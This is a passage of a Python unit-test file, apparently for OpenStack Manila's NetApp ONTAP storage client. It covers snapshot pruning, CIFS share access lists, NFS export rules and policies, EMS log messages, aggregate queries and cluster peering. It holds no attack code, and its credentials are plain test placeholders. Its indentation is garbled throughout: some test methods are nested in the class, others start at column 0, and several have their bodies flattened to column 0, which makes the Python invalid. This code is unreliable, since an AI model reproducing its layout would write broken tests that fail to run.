        mock_rename_snapshot = self.mock_object(self.client, 'rename_snapshot')

        self.client.soft_delete_snapshot(fake.SHARE_NAME, fake.SNAPSHOT_NAME)

        mock_delete_snapshot.assert_called_once_with(
            fake.SHARE_NAME, fake.SNAPSHOT_NAME)
        mock_rename_snapshot.assert_called_once_with(
            fake.SHARE_NAME, fake.SNAPSHOT_NAME,
            'deleted_manila_' + fake.SNAPSHOT_NAME)
    def test_prune_deleted_snapshots(self):
        """prune_deleted_snapshots attempts to delete every soft-deleted
        snapshot across vservers, continuing past per-snapshot errors."""
        deleted_snapshots_map = {
            'vserver1': [{
                'name': 'deleted_snap_1',
                'volume': 'fake_volume_1',
                'vserver': 'vserver1',
            }],
            'vserver2': [{
                'name': 'deleted_snap_2',
                'volume': 'fake_volume_2',
                'vserver': 'vserver2',
            }],
        }
        mock_get_deleted_snapshots = self.mock_object(
            self.client, '_get_deleted_snapshots',
            mock.Mock(return_value=deleted_snapshots_map))
        # Second delete raises to prove errors don't stop the pruning.
        mock_delete_snapshot = self.mock_object(
            self.client, 'delete_snapshot',
            mock.Mock(side_effect=[None, netapp_api.NaApiError]))
        # The client is deep-copied per vserver internally; return the
        # mocked client itself so the calls remain observable.
        self.mock_object(
            copy, 'deepcopy', mock.Mock(return_value=self.client))

        self.client.prune_deleted_snapshots()

        mock_get_deleted_snapshots.assert_called_once_with()
        mock_delete_snapshot.assert_has_calls([
            mock.call('fake_volume_1', 'deleted_snap_1'),
            mock.call('fake_volume_2', 'deleted_snap_2'),
        ], any_order=True)
    def test_get_deleted_snapshots(self):
        """_get_deleted_snapshots finds non-busy 'deleted_manila_*'
        snapshots and groups them by vserver."""
        api_response = netapp_api.NaElement(
            fake.SNAPSHOT_GET_ITER_DELETED_RESPONSE)
        self.mock_object(self.client,
                         'send_iter_request',
                         mock.Mock(return_value=api_response))

        result = self.client._get_deleted_snapshots()

        snapshot_get_iter_args = {
            'query': {
                'snapshot-info': {
                    'name': 'deleted_manila_*',
                    'busy': 'false',
                },
            },
            'desired-attributes': {
                'snapshot-info': {
                    'name': None,
                    'vserver': None,
                    'volume': None,
                },
            },
        }
        self.client.send_iter_request.assert_has_calls([
            mock.call('snapshot-get-iter', snapshot_get_iter_args)])

        expected = {
            fake.VSERVER_NAME: [{
                'name': 'deleted_manila_' + fake.SNAPSHOT_NAME,
                'volume': fake.SHARE_NAME,
                'vserver': fake.VSERVER_NAME,
            }],
        }
        self.assertDictEqual(expected, result)
    def test_create_cg_snapshot(self):
        """create_cg_snapshot starts then commits a consistency-group
        snapshot using the returned CG id."""
        mock_start_cg_snapshot = self.mock_object(
            self.client, '_start_cg_snapshot',
            mock.Mock(return_value=fake.CG_SNAPSHOT_ID))
        mock_commit_cg_snapshot = self.mock_object(
            self.client, '_commit_cg_snapshot')

        self.client.create_cg_snapshot([fake.SHARE_NAME, fake.SHARE_NAME_2],
                                       fake.SNAPSHOT_NAME)

        mock_start_cg_snapshot.assert_called_once_with(
            [fake.SHARE_NAME, fake.SHARE_NAME_2], fake.SNAPSHOT_NAME)
        mock_commit_cg_snapshot.assert_called_once_with(fake.CG_SNAPSHOT_ID)
    def test_create_cg_snapshot_no_id(self):
        """A missing CG id from cg-start raises and skips the commit."""
        mock_start_cg_snapshot = self.mock_object(
            self.client, '_start_cg_snapshot', mock.Mock(return_value=None))
        mock_commit_cg_snapshot = self.mock_object(
            self.client, '_commit_cg_snapshot')

        self.assertRaises(exception.NetAppException,
                          self.client.create_cg_snapshot,
                          [fake.SHARE_NAME, fake.SHARE_NAME_2],
                          fake.SNAPSHOT_NAME)

        mock_start_cg_snapshot.assert_called_once_with(
            [fake.SHARE_NAME, fake.SHARE_NAME_2], fake.SNAPSHOT_NAME)
        self.assertFalse(mock_commit_cg_snapshot.called)
    def test_start_cg_snapshot(self):
        """_start_cg_snapshot issues cg-start with relaxed timeout over
        all member volumes."""
        self.mock_object(self.client, 'send_request')

        self.client._start_cg_snapshot([fake.SHARE_NAME, fake.SHARE_NAME_2],
                                       fake.SNAPSHOT_NAME)

        cg_start_args = {
            'snapshot': fake.SNAPSHOT_NAME,
            'timeout': 'relaxed',
            'volumes': [
                {'volume-name': fake.SHARE_NAME},
                {'volume-name': fake.SHARE_NAME_2},
            ],
        }
        self.client.send_request.assert_has_calls([
            mock.call('cg-start', cg_start_args)])
def test_commit_cg_snapshot(self):
self.mock_object(self.client, 'send_request')
self.client._commit_cg_snapshot(fake.CG_SNAPSHOT_ID)
cg_commit_args = {'cg-id': fake.CG_SNAPSHOT_ID}
self.client.send_request.assert_has_calls([
mock.call('cg-commit', cg_commit_args)])
    def test_create_cifs_share(self):
        """create_cifs_share issues cifs-share-create with the share name
        and its '/<name>' path."""
        self.mock_object(self.client, 'send_request')

        self.client.create_cifs_share(fake.SHARE_NAME)

        cifs_share_create_args = {
            'path': '/%s' % fake.SHARE_NAME,
            'share-name': fake.SHARE_NAME
        }
        self.client.send_request.assert_has_calls([
            mock.call('cifs-share-create', cifs_share_create_args)])
    def test_get_cifs_share_access(self):
        """get_cifs_share_access returns a user/group -> permission map
        built from cifs-share-access-control-get-iter."""
        api_response = netapp_api.NaElement(
            fake.CIFS_SHARE_ACCESS_CONTROL_GET_ITER)
        self.mock_object(self.client,
                         'send_iter_request',
                         mock.Mock(return_value=api_response))

        result = self.client.get_cifs_share_access(fake.SHARE_NAME)

        cifs_share_access_control_get_iter_args = {
            'query': {
                'cifs-share-access-control': {
                    'share': fake.SHARE_NAME,
                },
            },
            'desired-attributes': {
                'cifs-share-access-control': {
                    'user-or-group': None,
                    'permission': None,
                },
            },
        }
        self.client.send_iter_request.assert_has_calls([
            mock.call('cifs-share-access-control-get-iter',
                      cifs_share_access_control_get_iter_args)])

        expected = {
            'Administrator': 'full_control',
            'Administrators': 'change',
            'Power Users': 'read',
            'Users': 'no_access',
        }
        self.assertDictEqual(expected, result)
    def test_get_cifs_share_access_not_found(self):
        """No ACL records yields an empty dict, not an error."""
        api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
        self.mock_object(self.client,
                         'send_iter_request',
                         mock.Mock(return_value=api_response))

        result = self.client.get_cifs_share_access(fake.SHARE_NAME)

        self.assertEqual({}, result)
    # readonly=True maps to 'read', readonly=False to 'full_control'.
    @ddt.data(True, False)
    def test_add_cifs_share_access(self, readonly):
        """add_cifs_share_access creates an ACL entry with the permission
        derived from the readonly flag."""
        self.mock_object(self.client, 'send_request')

        self.client.add_cifs_share_access(fake.SHARE_NAME,
                                          fake.USER_NAME,
                                          readonly)

        cifs_share_access_control_create_args = {
            'permission': 'read' if readonly else 'full_control',
            'share': fake.SHARE_NAME,
            'user-or-group': fake.USER_NAME
        }
        self.client.send_request.assert_has_calls([
            mock.call(
                'cifs-share-access-control-create',
                cifs_share_access_control_create_args)])
    # readonly=True maps to 'read', readonly=False to 'full_control'.
    @ddt.data(True, False)
    def test_modify_cifs_share_access(self, readonly):
        """modify_cifs_share_access updates an existing ACL entry with the
        permission derived from the readonly flag."""
        self.mock_object(self.client, 'send_request')

        self.client.modify_cifs_share_access(fake.SHARE_NAME,
                                             fake.USER_NAME,
                                             readonly)

        cifs_share_access_control_modify_args = {
            'permission': 'read' if readonly else 'full_control',
            'share': fake.SHARE_NAME,
            'user-or-group': fake.USER_NAME
        }
        self.client.send_request.assert_has_calls([
            mock.call(
                'cifs-share-access-control-modify',
                cifs_share_access_control_modify_args)])
    def test_remove_cifs_share_access(self):
        """remove_cifs_share_access deletes the user's ACL entry."""
        self.mock_object(self.client, 'send_request')

        self.client.remove_cifs_share_access(fake.SHARE_NAME, fake.USER_NAME)

        cifs_share_access_control_delete_args = {
            'user-or-group': fake.USER_NAME,
            'share': fake.SHARE_NAME
        }
        self.client.send_request.assert_has_calls([
            mock.call(
                'cifs-share-access-control-delete',
                cifs_share_access_control_delete_args)])
def test_remove_cifs_share(self):
self.mock_object(self.client, 'send_request')
self.client.remove_cifs_share(fake.SHARE_NAME)
cifs_share_delete_args = {'share-name': fake.SHARE_NAME}
self.client.send_request.assert_has_calls([
mock.call('cifs-share-delete', cifs_share_delete_args)])
    def test_add_nfs_export_rule(self):
        """With no existing rule for the client, a new export rule is
        created and no update happens."""
        mock_get_nfs_export_rule_indices = self.mock_object(
            self.client, '_get_nfs_export_rule_indices',
            mock.Mock(return_value=[]))
        mock_add_nfs_export_rule = self.mock_object(
            self.client, '_add_nfs_export_rule')
        mock_update_nfs_export_rule = self.mock_object(
            self.client, '_update_nfs_export_rule')

        self.client.add_nfs_export_rule(fake.EXPORT_POLICY_NAME,
                                        fake.IP_ADDRESS,
                                        False)

        mock_get_nfs_export_rule_indices.assert_called_once_with(
            fake.EXPORT_POLICY_NAME, fake.IP_ADDRESS)
        mock_add_nfs_export_rule.assert_called_once_with(
            fake.EXPORT_POLICY_NAME, fake.IP_ADDRESS, False)
        self.assertFalse(mock_update_nfs_export_rule.called)
    def test_add_nfs_export_rule_single_existing(self):
        """With exactly one existing rule, it is updated in place and no
        extra rules need removing."""
        mock_get_nfs_export_rule_indices = self.mock_object(
            self.client, '_get_nfs_export_rule_indices',
            mock.Mock(return_value=['1']))
        mock_add_nfs_export_rule = self.mock_object(
            self.client, '_add_nfs_export_rule')
        mock_update_nfs_export_rule = self.mock_object(
            self.client, '_update_nfs_export_rule')
        mock_remove_nfs_export_rules = self.mock_object(
            self.client, '_remove_nfs_export_rules')

        self.client.add_nfs_export_rule(fake.EXPORT_POLICY_NAME,
                                        fake.IP_ADDRESS,
                                        False)

        mock_get_nfs_export_rule_indices.assert_called_once_with(
            fake.EXPORT_POLICY_NAME, fake.IP_ADDRESS)
        self.assertFalse(mock_add_nfs_export_rule.called)
        mock_update_nfs_export_rule.assert_called_once_with(
            fake.EXPORT_POLICY_NAME, fake.IP_ADDRESS, False, '1')
        mock_remove_nfs_export_rules.assert_called_once_with(
            fake.EXPORT_POLICY_NAME, [])
    def test_add_nfs_export_rule_multiple_existing(self):
        """With multiple existing rules, the first is updated and the
        duplicates are removed."""
        mock_get_nfs_export_rule_indices = self.mock_object(
            self.client, '_get_nfs_export_rule_indices',
            mock.Mock(return_value=['2', '4', '6']))
        mock_add_nfs_export_rule = self.mock_object(
            self.client, '_add_nfs_export_rule')
        mock_update_nfs_export_rule = self.mock_object(
            self.client, '_update_nfs_export_rule')
        mock_remove_nfs_export_rules = self.mock_object(
            self.client, '_remove_nfs_export_rules')

        self.client.add_nfs_export_rule(fake.EXPORT_POLICY_NAME,
                                        fake.IP_ADDRESS,
                                        False)

        mock_get_nfs_export_rule_indices.assert_called_once_with(
            fake.EXPORT_POLICY_NAME, fake.IP_ADDRESS)
        self.assertFalse(mock_add_nfs_export_rule.called)
        mock_update_nfs_export_rule.assert_called_once_with(
            fake.EXPORT_POLICY_NAME, fake.IP_ADDRESS, False, '2')
        mock_remove_nfs_export_rules.assert_called_once_with(
            fake.EXPORT_POLICY_NAME, ['4', '6'])
    # readonly rules get rw-rule security flavor 'never' (no write
    # access); read-write rules get 'sys'.
    @ddt.data({'readonly': False, 'rw_security_flavor': 'sys'},
              {'readonly': True, 'rw_security_flavor': 'never'})
    @ddt.unpack
    def test__add_nfs_export_rule(self, readonly, rw_security_flavor):
        """_add_nfs_export_rule issues export-rule-create with flavors
        derived from the readonly flag."""
        self.mock_object(self.client, 'send_request')

        self.client._add_nfs_export_rule(fake.EXPORT_POLICY_NAME,
                                         fake.IP_ADDRESS,
                                         readonly)

        export_rule_create_args = {
            'policy-name': fake.EXPORT_POLICY_NAME,
            'client-match': fake.IP_ADDRESS,
            'ro-rule': {
                'security-flavor': 'sys',
            },
            'rw-rule': {
                'security-flavor': rw_security_flavor,
            },
            'super-user-security': {
                'security-flavor': 'sys',
            },
        }
        self.client.send_request.assert_has_calls(
            [mock.call('export-rule-create', export_rule_create_args)])
    # Same flavor mapping as rule creation, plus the target rule index.
    @ddt.data({'readonly': False, 'rw_security_flavor': 'sys', 'index': '2'},
              {'readonly': True, 'rw_security_flavor': 'never', 'index': '4'})
    @ddt.unpack
    def test_update_nfs_export_rule(self, readonly, rw_security_flavor, index):
        """_update_nfs_export_rule issues export-rule-modify against the
        given rule index."""
        self.mock_object(self.client, 'send_request')
        self.client._update_nfs_export_rule(fake.EXPORT_POLICY_NAME,
                                            fake.IP_ADDRESS,
                                            readonly,
                                            index)

        export_rule_modify_args = {
            'policy-name': fake.EXPORT_POLICY_NAME,
            'rule-index': index,
            'client-match': fake.IP_ADDRESS,
            'ro-rule': {
                'security-flavor': 'sys',
            },
            'rw-rule': {
                'security-flavor': rw_security_flavor,
            },
            'super-user-security': {
                'security-flavor': 'sys',
            },
        }
        self.client.send_request.assert_has_calls(
            [mock.call('export-rule-modify', export_rule_modify_args)])
    def test_get_nfs_export_rule_indices(self):
        """_get_nfs_export_rule_indices returns the rule indices matching
        a policy/client pair from export-rule-get-iter."""
        api_response = netapp_api.NaElement(fake.EXPORT_RULE_GET_ITER_RESPONSE)
        self.mock_object(self.client,
                         'send_iter_request',
                         mock.Mock(return_value=api_response))

        result = self.client._get_nfs_export_rule_indices(
            fake.EXPORT_POLICY_NAME, fake.IP_ADDRESS)

        export_rule_get_iter_args = {
            'query': {
                'export-rule-info': {
                    'policy-name': fake.EXPORT_POLICY_NAME,
                    'client-match': fake.IP_ADDRESS,
                },
            },
            'desired-attributes': {
                'export-rule-info': {
                    'vserver-name': None,
                    'policy-name': None,
                    'client-match': None,
                    'rule-index': None,
                },
            },
        }
        self.assertListEqual(['1', '3'], result)
        self.client.send_iter_request.assert_has_calls([
            mock.call('export-rule-get-iter', export_rule_get_iter_args)])
    def test_remove_nfs_export_rule(self):
        """remove_nfs_export_rule looks up the client's rule indices and
        removes them all."""
        fake_indices = ['1', '3', '4']
        mock_get_nfs_export_rule_indices = self.mock_object(
            self.client, '_get_nfs_export_rule_indices',
            mock.Mock(return_value=fake_indices))
        mock_remove_nfs_export_rules = self.mock_object(
            self.client, '_remove_nfs_export_rules')

        self.client.remove_nfs_export_rule(fake.EXPORT_POLICY_NAME,
                                           fake.IP_ADDRESS)

        mock_get_nfs_export_rule_indices.assert_called_once_with(
            fake.EXPORT_POLICY_NAME, fake.IP_ADDRESS)
        mock_remove_nfs_export_rules.assert_called_once_with(
            fake.EXPORT_POLICY_NAME, fake_indices)
    def test_remove_nfs_export_rules(self):
        """_remove_nfs_export_rules issues one export-rule-destroy per
        rule index."""
        fake_indices = ['1', '3']
        self.mock_object(self.client, 'send_request')

        self.client._remove_nfs_export_rules(fake.EXPORT_POLICY_NAME,
                                             fake_indices)

        self.client.send_request.assert_has_calls([
            mock.call(
                'export-rule-destroy',
                {'policy-name': fake.EXPORT_POLICY_NAME, 'rule-index': '1'}),
            mock.call(
                'export-rule-destroy',
                {'policy-name': fake.EXPORT_POLICY_NAME, 'rule-index': '3'})])
    def test_remove_nfs_export_rules_not_found(self):
        """EOBJECTNOTFOUND (rule already gone) is tolerated silently."""
        self.mock_object(self.client,
                         'send_request',
                         self._mock_api_error(code=netapp_api.EOBJECTNOTFOUND))

        self.client._remove_nfs_export_rules(fake.EXPORT_POLICY_NAME, ['1'])

        self.client.send_request.assert_has_calls([
            mock.call(
                'export-rule-destroy',
                {'policy-name': fake.EXPORT_POLICY_NAME, 'rule-index': '1'})])
    def test_remove_nfs_export_rules_api_error(self):
        """Other API errors from export-rule-destroy propagate."""
        self.mock_object(self.client, 'send_request', self._mock_api_error())

        self.assertRaises(netapp_api.NaApiError,
                          self.client._remove_nfs_export_rules,
                          fake.EXPORT_POLICY_NAME,
                          ['1'])
    def test_clear_nfs_export_policy_for_volume(self):
        """Clearing a volume's export policy resets it to 'default'."""
        mock_set_nfs_export_policy_for_volume = self.mock_object(
            self.client, 'set_nfs_export_policy_for_volume')

        self.client.clear_nfs_export_policy_for_volume(fake.SHARE_NAME)

        mock_set_nfs_export_policy_for_volume.assert_called_once_with(
            fake.SHARE_NAME, 'default')
    def test_set_nfs_export_policy_for_volume(self):
        """set_nfs_export_policy_for_volume updates the volume's export
        policy via volume-modify-iter."""
        self.mock_object(self.client, 'send_request')

        self.client.set_nfs_export_policy_for_volume(fake.SHARE_NAME,
                                                     fake.EXPORT_POLICY_NAME)

        volume_modify_iter_args = {
            'query': {
                'volume-attributes': {
                    'volume-id-attributes': {
                        'name': fake.SHARE_NAME,
                    },
                },
            },
            'attributes': {
                'volume-attributes': {
                    'volume-export-attributes': {
                        'policy': fake.EXPORT_POLICY_NAME,
                    },
                },
            },
        }
        self.client.send_request.assert_has_calls([
            mock.call('volume-modify-iter', volume_modify_iter_args)])
    def test_get_nfs_export_policy_for_volume(self):
        """get_nfs_export_policy_for_volume returns the policy name from
        the volume's export attributes."""
        api_response = netapp_api.NaElement(
            fake.VOLUME_GET_EXPORT_POLICY_RESPONSE)
        self.mock_object(self.client,
                         'send_iter_request',
                         mock.Mock(return_value=api_response))

        result = self.client.get_nfs_export_policy_for_volume(fake.SHARE_NAME)

        volume_get_iter_args = {
            'query': {
                'volume-attributes': {
                    'volume-id-attributes': {
                        'name': fake.SHARE_NAME,
                    },
                },
            },
            'desired-attributes': {
                'volume-attributes': {
                    'volume-export-attributes': {
                        'policy': None,
                    },
                },
            },
        }
        self.assertEqual(fake.EXPORT_POLICY_NAME, result)
        self.client.send_iter_request.assert_has_calls([
            mock.call('volume-get-iter', volume_get_iter_args)])
    def test_get_nfs_export_policy_for_volume_not_found(self):
        """A no-records response raises NetAppException — the volume is
        expected to exist."""
        api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
        self.mock_object(self.client,
                         'send_iter_request',
                         mock.Mock(return_value=api_response))

        self.assertRaises(exception.NetAppException,
                          self.client.get_nfs_export_policy_for_volume,
                          fake.SHARE_NAME)
    def test_create_nfs_export_policy(self):
        """create_nfs_export_policy issues export-policy-create."""
        self.mock_object(self.client, 'send_request')

        self.client.create_nfs_export_policy(fake.EXPORT_POLICY_NAME)

        export_policy_create_args = {'policy-name': fake.EXPORT_POLICY_NAME}
        self.client.send_request.assert_has_calls([
            mock.call('export-policy-create', export_policy_create_args)])
    def test_create_nfs_export_policy_already_present(self):
        """EDUPLICATEENTRY (policy already exists) is tolerated silently."""
        self.mock_object(self.client,
                         'send_request',
                         self._mock_api_error(code=netapp_api.EDUPLICATEENTRY))

        self.client.create_nfs_export_policy(fake.EXPORT_POLICY_NAME)

        export_policy_create_args = {'policy-name': fake.EXPORT_POLICY_NAME}
        self.client.send_request.assert_has_calls([
            mock.call('export-policy-create', export_policy_create_args)])
    def test_create_nfs_export_policy_api_error(self):
        """Other API errors from export-policy-create propagate."""
        self.mock_object(self.client, 'send_request', self._mock_api_error())

        self.assertRaises(netapp_api.NaApiError,
                          self.client.create_nfs_export_policy,
                          fake.EXPORT_POLICY_NAME)
    def test_soft_delete_nfs_export_policy(self):
        """If the hard delete succeeds, no rename (soft delete) occurs."""
        self.mock_object(self.client, 'delete_nfs_export_policy')
        self.mock_object(self.client, 'rename_nfs_export_policy')

        self.client.soft_delete_nfs_export_policy(fake.EXPORT_POLICY_NAME)

        self.client.delete_nfs_export_policy.assert_has_calls([
            mock.call(fake.EXPORT_POLICY_NAME)])
        self.assertFalse(self.client.rename_nfs_export_policy.called)
def test_soft_delete_nfs_export_policy_api_error(self):
    """If the delete fails, the policy is renamed for later pruning."""
    self.mock_object(self.client,
                     'delete_nfs_export_policy',
                     self._mock_api_error())
    self.mock_object(self.client, 'rename_nfs_export_policy')

    self.client.soft_delete_nfs_export_policy(fake.EXPORT_POLICY_NAME)

    self.client.delete_nfs_export_policy.assert_has_calls([
        mock.call(fake.EXPORT_POLICY_NAME)])
    self.assertTrue(self.client.rename_nfs_export_policy.called)
def test_delete_nfs_export_policy(self):
    """Deleting a policy sends export-policy-destroy with its name."""
    self.mock_object(self.client, 'send_request')

    self.client.delete_nfs_export_policy(fake.EXPORT_POLICY_NAME)

    expected_call = mock.call(
        'export-policy-destroy', {'policy-name': fake.EXPORT_POLICY_NAME})
    self.client.send_request.assert_has_calls([expected_call])
def test_delete_nfs_export_policy_not_found(self):
    """An EOBJECTNOTFOUND error is ignored, making the delete idempotent."""
    self.mock_object(self.client,
                     'send_request',
                     self._mock_api_error(code=netapp_api.EOBJECTNOTFOUND))

    self.client.delete_nfs_export_policy(fake.EXPORT_POLICY_NAME)

    export_policy_destroy_args = {'policy-name': fake.EXPORT_POLICY_NAME}
    self.client.send_request.assert_has_calls([
        mock.call('export-policy-destroy', export_policy_destroy_args)])
def test_delete_nfs_export_policy_api_error(self):
    """Other API errors during delete propagate as NaApiError."""
    self.mock_object(self.client, 'send_request', self._mock_api_error())

    self.assertRaises(netapp_api.NaApiError,
                      self.client.delete_nfs_export_policy,
                      fake.EXPORT_POLICY_NAME)
def test_rename_nfs_export_policy(self):
    """Renaming passes both the old and the new policy names to the API."""
    self.mock_object(self.client, 'send_request')

    self.client.rename_nfs_export_policy(fake.EXPORT_POLICY_NAME,
                                         'new_policy_name')

    expected_args = {
        'policy-name': fake.EXPORT_POLICY_NAME,
        'new-policy-name': 'new_policy_name'
    }
    self.client.send_request.assert_has_calls(
        [mock.call('export-policy-rename', expected_args)])
def test_prune_deleted_nfs_export_policies(self):
    """Every policy reported as deleted is destroyed on its vserver."""
    # Mock client lest we not be able to see calls on its copy.
    self.mock_object(copy,
                     'deepcopy',
                     mock.Mock(return_value=self.client))
    self.mock_object(self.client,
                     '_get_deleted_nfs_export_policies',
                     mock.Mock(return_value=fake.DELETED_EXPORT_POLICIES))
    self.mock_object(self.client, 'delete_nfs_export_policy')

    self.client.prune_deleted_nfs_export_policies()

    self.assertTrue(self.client.delete_nfs_export_policy.called)
    # One delete call per deleted policy found on the fake vserver.
    self.client.delete_nfs_export_policy.assert_has_calls(
        [mock.call(policy) for policy in
         fake.DELETED_EXPORT_POLICIES[fake.VSERVER_NAME]])
def test_prune_deleted_nfs_export_policies_api_error(self):
self.mock_object(copy,
'deepcopy',
mock.Mock(return_value=self.client))
self.mock_object(self.client,
'_get_deleted_nfs_export_policies',
mock.Mock(return_value=fake.DELETED_EXPORT_POLICIES))
self.mock_object(self.client,
'delete_nfs_export_policy',
self._mock_api_error())
self.client.prune_deleted_nfs_export_policies()
self.assertTrue(self.client.delete_nfs_export_policy.called)
self.client.delete_nfs_export_policy.assert_has_calls(
[mock.call(policy) for policy in
fake.DELETED_EXPORT_POLICIES[fake.VSERVER_NAME]])
def test_get_deleted_nfs_export_policies(self):
api_response = netapp_api.NaElement(
fake.DELETED_EXPORT_POLICY_GET_ITER_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client._get_deleted_nfs_export_policies()
export_policy_get_iter_args = {
'query': {
'export-policy-info': {
'policy-name': 'deleted_manila_*',
},
},
'desired-attributes': {
'export-policy-info': {
'policy-name': None,
'vserver': None,
},
},
}
self.assertSequenceEqual(fake.DELETED_EXPORT_POLICIES, result)
self.client.send_iter_request.assert_has_calls([
mock.call('export-policy-get-iter', export_policy_get_iter_args)])
def test_get_ems_log_destination_vserver(self):
self.mock_object(self.client,
'get_ontapi_version',
mock.Mock(return_value=(1, 21)))
mock_list_vservers = self.mock_object(
self.client,
'list_vservers',
mock.Mock(return_value=[fake.ADMIN_VSERVER_NAME]))
result = self.client._get_ems_log_destination_vserver()
mock_list_vservers.assert_called_once_with(vserver_type='admin')
self.assertEqual(fake.ADMIN_VSERVER_NAME, result)
def test_get_ems_log_destination_vserver_future(self):
self.mock_object(self.client,
'get_ontapi_version',
mock.Mock(return_value=(2, 0)))
mock_list_vservers = self.mock_object(
self.client,
'list_vservers',
mock.Mock(return_value=[fake.ADMIN_VSERVER_NAME]))
result = self.client._get_ems_log_destination_vserver()
mock_list_vservers.assert_called_once_with(vserver_type='admin')
self.assertEqual(fake.ADMIN_VSERVER_NAME, result)
def test_get_ems_log_destination_vserver_legacy(self):
self.mock_object(self.client,
'get_ontapi_version',
mock.Mock(return_value=(1, 15)))
mock_list_vservers = self.mock_object(
self.client,
'list_vservers',
mock.Mock(return_value=[fake.NODE_VSERVER_NAME]))
result = self.client._get_ems_log_destination_vserver()
mock_list_vservers.assert_called_once_with(vserver_type='node')
self.assertEqual(fake.NODE_VSERVER_NAME, result)
def test_get_ems_log_destination_no_cluster_creds(self):
self.mock_object(self.client,
'get_ontapi_version',
mock.Mock(return_value=(1, 21)))
mock_list_vservers = self.mock_object(
self.client,
'list_vservers',
mock.Mock(side_effect=[[], [fake.VSERVER_NAME]]))
result = self.client._get_ems_log_destination_vserver()
mock_list_vservers.assert_has_calls([
mock.call(vserver_type='admin'),
mock.call(vserver_type='data')])
self.assertEqual(fake.VSERVER_NAME, result)
def test_get_ems_log_destination_vserver_not_found(self):
self.mock_object(self.client,
'get_ontapi_version',
mock.Mock(return_value=(1, 21)))
mock_list_vservers = self.mock_object(
self.client,
'list_vservers',
mock.Mock(return_value=[]))
self.assertRaises(exception.NotFound,
self.client._get_ems_log_destination_vserver)
mock_list_vservers.assert_has_calls([
mock.call(vserver_type='admin'),
mock.call(vserver_type='data'),
mock.call(vserver_type='node')])
def test_send_ems_log_message(self):
# Mock client lest we not be able to see calls on its copy.
self.mock_object(copy,
'deepcopy',
mock.Mock(return_value=self.client))
self.mock_object(self.client,
'_get_ems_log_destination_vserver',
mock.Mock(return_value=fake.ADMIN_VSERVER_NAME))
self.mock_object(self.client, 'send_request')
self.client.send_ems_log_message(fake.EMS_MESSAGE)
self.client.send_request.assert_has_calls([
mock.call('ems-autosupport-log', fake.EMS_MESSAGE)])
self.assertEqual(1, client_cmode.LOG.debug.call_count)
def test_send_ems_log_message_api_error(self):
# Mock client lest we not be able to see calls on its copy.
self.mock_object(copy,
'deepcopy',
mock.Mock(return_value=self.client))
self.mock_object(self.client,
'_get_ems_log_destination_vserver',
mock.Mock(return_value=fake.ADMIN_VSERVER_NAME))
self.mock_object(self.client, 'send_request', self._mock_api_error())
self.client.send_ems_log_message(fake.EMS_MESSAGE)
self.client.send_request.assert_has_calls([
mock.call('ems-autosupport-log', fake.EMS_MESSAGE)])
self.assertEqual(1, client_cmode.LOG.warning.call_count)
def test_get_aggregate_raid_types(self):
api_response = netapp_api.NaElement(fake.AGGR_GET_RAID_TYPE_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client.get_aggregate_raid_types(
fake.SHARE_AGGREGATE_NAMES)
aggr_get_iter_args = {
'query': {
'aggr-attributes': {
'aggregate-name': '|'.join(fake.SHARE_AGGREGATE_NAMES),
}
},
'desired-attributes': {
'aggr-attributes': {
'aggregate-name': None,
'aggr-raid-attributes': {
'raid-type': None,
}
}
}
}
expected = {
fake.SHARE_AGGREGATE_NAMES[0]:
fake.SHARE_AGGREGATE_RAID_TYPES[0],
fake.SHARE_AGGREGATE_NAMES[1]:
fake.SHARE_AGGREGATE_RAID_TYPES[1]
}
self.client.send_iter_request.assert_has_calls([
mock.call('aggr-get-iter', aggr_get_iter_args)])
self.assertDictEqual(expected, result)
def test_get_aggregate_raid_types_not_found(self):
api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client.get_aggregate_raid_types(
fake.SHARE_AGGREGATE_NAMES)
self.assertDictEqual({}, result)
def test_get_aggregate_disk_types(self):
api_response = netapp_api.NaElement(
fake.STORAGE_DISK_GET_ITER_RESPONSE)
self.mock_object(self.client,
'send_request',
mock.Mock(return_value=api_response))
result = self.client.get_aggregate_disk_types(
fake.SHARE_AGGREGATE_NAMES)
expected = {
fake.SHARE_AGGREGATE_NAMES[0]:
fake.SHARE_AGGREGATE_DISK_TYPE,
fake.SHARE_AGGREGATE_NAMES[1]:
fake.SHARE_AGGREGATE_DISK_TYPE
}
self.assertEqual(len(fake.SHARE_AGGREGATE_NAMES),
self.client.send_request.call_count)
self.assertDictEqual(expected, result)
def test_get_aggregate_disk_types_not_found(self):
api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
self.mock_object(self.client,
'send_request',
mock.Mock(return_value=api_response))
result = self.client.get_aggregate_disk_types(
fake.SHARE_AGGREGATE_NAMES)
self.assertEqual(len(fake.SHARE_AGGREGATE_NAMES),
self.client.send_request.call_count)
self.assertDictEqual({}, result)
def test_check_for_cluster_credentials(self):
    """A successful system-node query implies cluster-scoped credentials."""
    api_response = netapp_api.NaElement(fake.SYSTEM_NODE_GET_ITER_RESPONSE)
    self.mock_object(self.client,
                     'send_iter_request',
                     mock.Mock(return_value=api_response))

    result = self.client.check_for_cluster_credentials()

    self.assertTrue(result)
def test_check_for_cluster_credentials_not_cluster(self):
    """EAPINOTFOUND means vserver-scoped credentials; False is returned."""
    self.mock_object(self.client,
                     'send_iter_request',
                     mock.Mock(side_effect=self._mock_api_error(
                         netapp_api.EAPINOTFOUND)))

    result = self.client.check_for_cluster_credentials()

    self.assertFalse(result)
def test_check_for_cluster_credentials_api_error(self):
    """Unexpected API errors propagate rather than being reported as False."""
    self.mock_object(self.client,
                     'send_iter_request',
                     self._mock_api_error())

    self.assertRaises(netapp_api.NaApiError,
                      self.client.check_for_cluster_credentials)
def test_create_cluster_peer(self):
self.mock_object(self.client, 'send_request')
self.client.create_cluster_peer(['fake_address_1', 'fake_address_2'],
'fake_user', 'fake_password',
'fake_passphrase')
cluster_peer_create_args = {
'peer-addresses': [
{'remote-inet-address': 'fake_address_1'},
{'remote-inet-address': 'fake_address_2'},
],
'user-name': 'fake_user',
'password': 'fake_password',
'passphrase': 'fake_passphrase',
}
self.client.send_request.assert_has_calls([
mock.call('cluster-peer-create', cluster_peer_create_args)])
def test_get_cluster_peers(self):
api_response = netapp_api.NaElement(
